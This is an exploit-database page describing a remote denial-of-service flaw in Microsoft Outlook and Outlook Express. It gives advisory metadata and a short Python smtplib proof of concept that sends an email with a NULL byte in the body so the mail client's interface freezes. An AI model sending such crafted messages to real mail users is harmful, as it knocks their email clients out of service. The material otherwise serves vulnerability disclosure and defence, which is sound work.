Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Remote Denial of Service Vulnerability in Microsoft Outlook and Outlook Express - exploit.company
header-logo
Suggest Exploit
vendor:
Microsoft Outlook, Outlook Express
by:
Unknown
7.5
CVSS
HIGH
Remote Denial of Service
Unknown
CWE
Product Name: Microsoft Outlook, Outlook Express
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: cpe:2.3:a:microsoft:outlook:*:*:*:*:*:*:*\cpe:2.3:a:microsoft:outlook_express:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Remote Denial of Service Vulnerability in Microsoft Outlook and Outlook Express

A remote attacker can exploit a vulnerability in Microsoft Outlook and Outlook Express by sending a malicious email containing a NULL character in the message body. This can cause the GUI to stop responding, resulting in a denial of service condition for users.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10144/info

Microsoft Outlook and Outlook Express have been reported prone to a remote denial of service vulnerability. The issue is reported to present itself when a NULL is encountered in the message body of an e-mail.

It is reported that when the vulnerable software encounters a malicious e-mail as described above, the GUI will cease to respond.

A remote attacker may potentially exploit this condition to deny service to Microsoft Outlook and Outlook Express users.

import smtplib
from_address = "nobody@example.com"
to_address = "nobody@example.com"
message = "Before\r\n\000\r\nAfter"
smtp = smtplib.SMTP("localhost")
smtp.set_debuglevel(1)
smtp.sendmail(from_address, [to_address], message)
smtp.quit()